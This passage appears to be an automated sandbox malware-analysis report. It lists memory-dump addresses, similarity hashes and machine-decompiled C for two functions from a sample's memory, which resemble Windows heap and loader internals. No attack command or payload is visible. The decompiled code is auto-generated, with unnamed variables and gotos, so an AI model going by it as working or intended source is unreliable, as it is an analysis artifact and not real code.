                                                              0x00a3dd35
                                                              0x00000000
                                                              0x00a3dd35
                                                              0x00a3dc5b
                                                              0x00a3dc5b
                                                              0x00a3dc5e
                                                              0x00a3dc61
                                                              0x00a3dc64
                                                              0x00a3dc67
                                                              0x00a3dc67
                                                              0x00a3dc6a
                                                              0x00a3dc6c
                                                              0x00a3dc8e
                                                              0x00a3dc8e
                                                              0x00a3dc91
                                                              0x00a3dc93
                                                              0x00a3dcce
                                                              0x00a3dcce
                                                              0x00a3dc95
                                                              0x00a3dc9c
                                                              0x00a3dc6e
                                                              0x00a3dc72
                                                              0x00a3dc75
                                                              0x00a3dc77
                                                              0x00a3dc79
                                                              0x00a8b551
                                                              0x00a8b551
                                                              0x00000000
                                                              0x00a3dc7f
                                                              0x00a3dc7f
                                                              0x00a3dc81
                                                              0x00000000
                                                              0x00a3dc83
                                                              0x00a3dc86
                                                              0x00a3dc88
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a3dc88
                                                              0x00a3dc81
                                                              0x00a3dc79
                                                              0x00a3dc6c
                                                              0x00a3dc55
                                                              0x00a3dc47
                                                              0x00a3dc43
                                                              0x00000000
                                                              0x00a3dc36
                                                              0x00a3dc23
                                                              0x00000000
                                                              0x00a3dbff
                                                              0x00a3dbf1
                                                              0x00a3dbdf
                                                              0x00a3db8f
                                                              0x00a3db92
                                                              0x00a3db95
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a3db95
                                                              0x00a3db8d
                                                              0x00a3db85
                                                              0x00a3db74
                                                              0x00a3dc9f
                                                              0x00a3dca2
                                                              0x00a3dcb0
                                                              0x00a3dcb0
                                                              0x00a3dad1
                                                              0x00a8b4e5
                                                              0x00a8b4c8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a3d831
                                                              0x00000000
                                                              0x00a3d800
                                                              0x00a8b47f
                                                              0x00a8b485
                                                              0x00000000
                                                              0x00a8b485
                                                              0x00a3d665
                                                              0x00a3d652
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d8a688da302ece4cc56cb1f4dc4c07285d48c8521c43dd2bb4674d7fb183b4d
                                                              • Instruction ID: e1e5b03105eb3dc1c7b48ec728f9b961989378a00105172e9dad2bff4ea9ff4b
                                                              • Opcode Fuzzy Hash: 2d8a688da302ece4cc56cb1f4dc4c07285d48c8521c43dd2bb4674d7fb183b4d
                                                              • Instruction Fuzzy Hash: 7DE1F370A14359CFEB34DF28D985BA9B7B2BF45304F1441A9F8099B291DB30AD85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3849B Relevance: .3, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 92%
                                                              			E00A3849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0xaff9c0);
				E00A7D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0xb17b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E00A3CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E00A42280( *[fs:0x30], 0xb18550);
						_t139 =  *0xb17b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E00A5F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E00A3FFB0(_t193, _t235, 0xb18550);
								L5:
								return E00A7D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E00A21C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0xb17b9c; // 0x0
							_t235 = L00A44620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0xb17b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E00A5A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E00A3FFB0(_t193, _t235, 0xb18550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L00A477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L00A477F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0xb17b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0xb17b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E00A637C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0xb17b9c; // 0x0
									_t214 = L00A44620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E00A637F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0xb17b10 =  *0xb17b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0xb17b04 =  *0xb17b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L00A477F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L00A477F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0xb17b08 =  *0xb17b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E00A657C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E00A6F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L00A477F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E00A5A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L00A477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E00A696C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                              0x00a3849b
                                                              0x00a3849b
                                                              0x00a3849b
                                                              0x00a3849b
                                                              0x00a3849d
                                                              0x00a384a2
                                                              0x00a384a7
                                                              0x00a384b1
                                                              0x00a384d8
                                                              0x00000000
                                                              0x00a384b3
                                                              0x00a384c4
                                                              0x00a384c9
                                                              0x00a384cd
                                                              0x00a384cf
                                                              0x00a384cf
                                                              0x00a384d6
                                                              0x00a384e6
                                                              0x00a384e9
                                                              0x00a384ec
                                                              0x00a384ef
                                                              0x00a384f2
                                                              0x00a384f4
                                                              0x00a384fc
                                                              0x00a38501
                                                              0x00a38506
                                                              0x00a38509
                                                              0x00a386e0
                                                              0x00a386e5
                                                              0x00a386e8
                                                              0x00a386ed
                                                              0x00a386f0
                                                              0x00a386f2
                                                              0x00a89afd
                                                              0x00a89b02
                                                              0x00a384da
                                                              0x00a384df
                                                              0x00a384df
                                                              0x00a386fa
                                                              0x00a386fd
                                                              0x00a386fe
                                                              0x00a38701
                                                              0x00a38706
                                                              0x00a38709
                                                              0x00a3870b
                                                              0x00000000
                                                              0x00000000
                                                              0x00a38711
                                                              0x00a38725
                                                              0x00a38727
                                                              0x00a3872a
                                                              0x00a3872c
                                                              0x00a89af0
                                                              0x00a89af5
                                                              0x00a38732
                                                              0x00a38732
                                                              0x00a38732
                                                              0x00a38735
                                                              0x00a38737
                                                              0x00a38515
                                                              0x00a38515
                                                              0x00a38518
                                                              0x00a3851d
                                                              0x00a38523
                                                              0x00a38527
                                                              0x00a3852b
                                                              0x00a38537
                                                              0x00a38539
                                                              0x00a3853c
                                                              0x00a3853e
                                                              0x00a3868c
                                                              0x00a38691
                                                              0x00a38699
                                                              0x00a3869b
                                                              0x00a38744
                                                              0x00a38748
                                                              0x00a386a1
                                                              0x00a386a1
                                                              0x00a386a1
                                                              0x00a386a4
                                                              0x00a386a8
                                                              0x00a89bdf
                                                              0x00a89bdf
                                                              0x00a386ae
                                                              0x00a386b0
                                                              0x00000000
                                                              0x00a386b6
                                                              0x00000000
                                                              0x00a89be9
                                                              0x00a386b0
                                                              0x00a38544
                                                              0x00a3854a
                                                              0x00a3854d
                                                              0x00a38551
                                                              0x00a3876e
                                                              0x00a38778
                                                              0x00a3877b
                                                              0x00a38780
                                                              0x00a38557
                                                              0x00a38557
                                                              0x00a3855d
                                                              0x00a3855d
                                                              0x00a3856b
                                                              0x00a3856e
                                                              0x00a38570
                                                              0x00a38573
                                                              0x00a38576
                                                              0x00a38576
                                                              0x00a38579
                                                              0x00a3857b
                                                              0x00000000
                                                              0x00000000
                                                              0x00a38581
                                                              0x00a385a0
                                                              0x00a385a2
                                                              0x00a385a5
                                                              0x00a385a7
                                                              0x00a89b1b
                                                              0x00a89b1b
                                                              0x00a3862e
                                                              0x00a3862e
                                                              0x00a38631
                                                              0x00a38631
                                                              0x00a38634
                                                              0x00a38636
                                                              0x00a38669
                                                              0x00a38669
                                                              0x00a3866b
                                                              0x00a89bbf
                                                              0x00a89bc4
                                                              0x00a89bc8
                                                              0x00a89bce
                                                              0x00a89bce
                                                              0x00a38671
                                                              0x00a38671
                                                              0x00a38674
                                                              0x00a38676
                                                              0x00a89bae
                                                              0x00a89bae
                                                              0x00a38676
                                                              0x00a3867c
                                                              0x00a3867e
                                                              0x00a38688
                                                              0x00a38688
                                                              0x00000000
                                                              0x00a3867e
                                                              0x00a38638
                                                              0x00a38638
                                                              0x00a3863b
                                                              0x00a3863e
                                                              0x00a3863f
                                                              0x00a38642
                                                              0x00a38645
                                                              0x00a38648
                                                              0x00a3864d
                                                              0x00a89b69
                                                              0x00a89b6e
                                                              0x00a89b7b
                                                              0x00a89b81
                                                              0x00a89b85
                                                              0x00a89b89
                                                              0x00a89ba7
                                                              0x00a89b8b
                                                              0x00a89b91
                                                              0x00a89b9a
                                                              0x00a89b9f
                                                              0x00a89b9f
                                                              0x00a38788
                                                              0x00a3878d
                                                              0x00a38763
                                                              0x00a38763
                                                              0x00a38766
                                                              0x00000000
                                                              0x00a38766
                                                              0x00a89b70
                                                              0x00000000
                                                              0x00a89b70
                                                              0x00a38656
                                                              0x00a3865a
                                                              0x00a3865c
                                                              0x00a38752
                                                              0x00a38756
                                                              0x00000000
                                                              0x00000000
                                                              0x00a3875e
                                                              0x00000000
                                                              0x00a3875e
                                                              0x00a38662
                                                              0x00a38662
                                                              0x00a38662
                                                              0x00a38666
                                                              0x00000000
                                                              0x00a38666
                                                              0x00a385b7
                                                              0x00a385b9
                                                              0x00a385bc
                                                              0x00a385bf
                                                              0x00a385cc
                                                              0x00a385d1
                                                              0x00a385d4
                                                              0x00a385db
                                                              0x00a385de
                                                              0x00a385e0
                                                              0x00a89b5f
                                                              0x00000000
                                                              0x00a89b5f
                                                              0x00a385e6
                                                              0x00a385ea
                                                              0x00a386c3
                                                              0x00a386c5
                                                              0x00a386c8
                                                              0x00a386ca
                                                              0x00a89b16
                                                              0x00000000
                                                              0x00a89b16
                                                              0x00a386d6
                                                              0x00a385f6
                                                              0x00a385f6
                                                              0x00a385f9
                                                              0x00a38602
                                                              0x00a38606
                                                              0x00a3860a
                                                              0x00a3860b
                                                              0x00a3860e
                                                              0x00a38611
                                                              0x00000000
                                                              0x00a38611
                                                              0x00a385f3
                                                              0x00000000
                                                              0x00a385f3
                                                              0x00a38619
                                                              0x00a3861e
                                                              0x00a3861e
                                                              0x00a38621
                                                              0x00a38622
                                                              0x00a38623
                                                              0x00a38625
                                                              0x00a3862c
                                                              0x00000000
                                                              0x00a3873d
                                                              0x00000000
                                                              0x00a3873d
                                                              0x00a38737
                                                              0x00a3850f
                                                              0x00a38512
                                                              0x00000000
                                                              0x00a38512
                                                              0x00000000
                                                              0x00a384d6

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9223664c181dfcaff74ac4ad8b206fd6de74d29ac1752de194a11767d1fab01
                                                              • Instruction ID: 0e269bc96bcd6246973ed80bd30b0ec2a569bfe627c044a97ed024bfea100f4e
                                                              • Opcode Fuzzy Hash: e9223664c181dfcaff74ac4ad8b206fd6de74d29ac1752de194a11767d1fab01
                                                              • Instruction Fuzzy Hash: ACB15AB4E04349DFCB14DFA8C985AAEBBB6BF48304F248129F405AB256DB74AD45CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5513A Relevance: .3, Instructions: 258COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 67%
                                                              			E00A5513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0xb1d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E00A6D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E00A42280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L00A44620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E00A6F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E00A3FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0xb1b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E00A6B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                              0x00a55142
                                                              0x00a5514c
                                                              0x00a55150
                                                              0x00a55157
                                                              0x00a55159
                                                              0x00a5515e
                                                              0x00a55165
                                                              0x00a55169
                                                              0x00a5516c
                                                              0x00a55172
                                                              0x00a55176
                                                              0x00a5517a
                                                              0x00a5517a
                                                              0x00a5517a
                                                              0x00a5517f
                                                              0x00a96d8b
                                                              0x00a96d8e
                                                              0x00a96d91
                                                              0x00a96d95
                                                              0x00a96d98
                                                              0x00a96d9c
                                                              0x00a96da0
                                                              0x00a96da3
                                                              0x00a96da7
                                                              0x00a96e26
                                                              0x00a96e26
                                                              0x00a96e2a
                                                              0x00a551f9
                                                              0x00a551f9
                                                              0x00a551fe
                                                              0x00a96e33
                                                              0x00a96e33
                                                              0x00a96e39
                                                              0x00a96e3d
                                                              0x00a96e46
                                                              0x00a96e50
                                                              0x00000000
                                                              0x00000000
                                                              0x00a96e52
                                                              0x00a96e53
                                                              0x00a96e56
                                                              0x00a96e5d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a96e5f
                                                              0x00a96e67
                                                              0x00a96e77
                                                              0x00a96e7f
                                                              0x00a96e80
                                                              0x00a96e88
                                                              0x00a96e90
                                                              0x00a96e9f
                                                              0x00a96ea5
                                                              0x00a96ea9
                                                              0x00a96eb1
                                                              0x00a96ebf
                                                              0x00000000
                                                              0x00000000
                                                              0x00a96ecf
                                                              0x00a96ed3
                                                              0x00000000
                                                              0x00000000
                                                              0x00a96edb
                                                              0x00a96ede
                                                              0x00a96ee1
                                                              0x00a96ee8
                                                              0x00a96eeb
                                                              0x00a96eed
                                                              0x00a96ef0
                                                              0x00a96ef4
                                                              0x00a96ef8
                                                              0x00a96efc
                                                              0x00000000
                                                              0x00000000
                                                              0x00a96f0d
                                                              0x00a96f11
                                                              0x00a96f32
                                                              0x00a96f37
                                                              0x00a96f3b
                                                              0x00a96f3e
                                                              0x00a96f41
                                                              0x00a96f46
                                                              0x00000000
                                                              0x00000000
                                                              0x00a96f4c
                                                              0x00a96f50
                                                              0x00a96f50
                                                              0x00a96f54
                                                              0x00a96f62
                                                              0x00a96f65
                                                              0x00a96f6d
                                                              0x00a96f7b
                                                              0x00a96f7b
                                                              0x00a96f93
                                                              0x00a96f98
                                                              0x00a96fa0
                                                              0x00a96fa6
                                                              0x00a96fb3
                                                              0x00a96fb6
                                                              0x00a96fbf
                                                              0x00a96fc1
                                                              0x00a96fd5
                                                              0x00a96fda
                                                              0x00a96fda
                                                              0x00a96fdd
                                                              0x00a96fe2
                                                              0x00a96fe7
                                                              0x00a96feb
                                                              0x00a96fef
                                                              0x00a96ff3
                                                              0x00a5520c
                                                              0x00a5520c
                                                              0x00a5520f
                                                              0x00a55215
                                                              0x00a55234
                                                              0x00a5523a
                                                              0x00a5523a
                                                              0x00a55244
                                                              0x00a55245
                                                              0x00a55246
                                                              0x00a55251
                                                              0x00a55251
                                                              0x00a96f13
                                                              0x00a96f17
                                                              0x00a96f17
                                                              0x00a96f18
                                                              0x00a96f1b
                                                              0x00a96f1f
                                                              0x00a96f23
                                                              0x00000000
                                                              0x00a96f28
                                                              0x00a55204
                                                              0x00a55204
                                                              0x00a55208
                                                              0x00000000
                                                              0x00a55208
                                                              0x00a55185
                                                              0x00a55188
                                                              0x00a5518a
                                                              0x00a5518e
                                                              0x00a55195
                                                              0x00a96db1
                                                              0x00a96db5
                                                              0x00a96db9
                                                              0x00a5519b
                                                              0x00a5519b
